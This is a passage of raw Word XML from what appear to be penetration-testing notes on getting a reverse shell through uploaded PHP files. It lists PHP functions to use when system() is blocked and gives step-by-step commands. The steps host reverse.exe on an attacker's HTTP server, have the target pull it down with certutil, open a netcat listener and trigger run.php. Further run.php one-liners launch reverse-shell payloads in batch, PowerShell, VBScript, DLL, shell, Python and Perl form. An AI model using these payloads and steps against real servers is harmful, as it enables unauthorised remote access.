        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HERE ARE SOME ALTERNATIVES TO system() (like in case system() is blocked):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ED9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exec() </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– captures output instead of printing it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exec('reverse.exe', $output, $exit_code);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EDB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So just make sure to include a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> $output </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">variable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EDC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell_exec() </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– returns the entire output as a string.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EDD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$output = shell_exec('reverse.exe');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EDE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passthru() </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– like system() but used for raw binary output (e.g. images, compiled output).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passthru('reverse.exe', $exit_code);</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Upload scripts onto Web Server and then open a python host with your reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="782"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="782"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure the port matches whatever the port is on upload.php</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: Trigger the scripts via web server</w:t>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t xml:space="preserve">Visit in browser:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EE8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://target/upload.ph</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1385"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This runs certutil.exe on the server, which pulls down your reverse.exe from your Kali machine.</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="504"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lvnp 80</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, visit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EEF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://target/run.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EF0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This executes reverse.exe, which then connects back to you.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open listener first</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qtxerge15sus" w:id="128"/>
      <w:bookmarkEnd w:id="128"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What run.php looks like for non .exe payloads</w:t>
      </w:r>
    </w:p>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is purely theoretical, but if we wanted to use a payload other than .exe, for example against a Linux Machine, then maybe we can edit </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run.php </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to look like this:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Widows Targets</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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t xml:space="preserve">bat file (Batch script)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EFB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('cmd /c reverse.bat', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EFD">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EFE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps1 file (PowerShell script)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000EFF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F00">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('powershell -ExecutionPolicy Bypass -File reverse.ps1', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F01">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vbs file (VBScript)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F04">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('wscript.exe reverse.vbs', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F05">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dll file (DLL executed via rundll32)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F07">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Assumes the DLL has an exported function like main</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F08">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F09">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('rundll32 reverse.dll,main', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F0A">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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Targets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F0E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>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t xml:space="preserve">.sh file (Shell script)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F10">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F11">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('bash reverse.sh', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F12">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F13">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or if it's executable:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F14">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F15">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('./reverse.sh', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F16">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>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t xml:space="preserve">ELF binary (compiled Linux executable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F19">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F1A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('./reverse', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F1B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>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t xml:space="preserve">.py file (Python script)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F1E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F1F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('python3 reverse.py', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F20">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>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t xml:space="preserve">.pl file (Perl script)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F23">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F24">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('perl reverse.pl', $val);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F25">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.rb file (Ruby script)</w:t>
      </w:r>
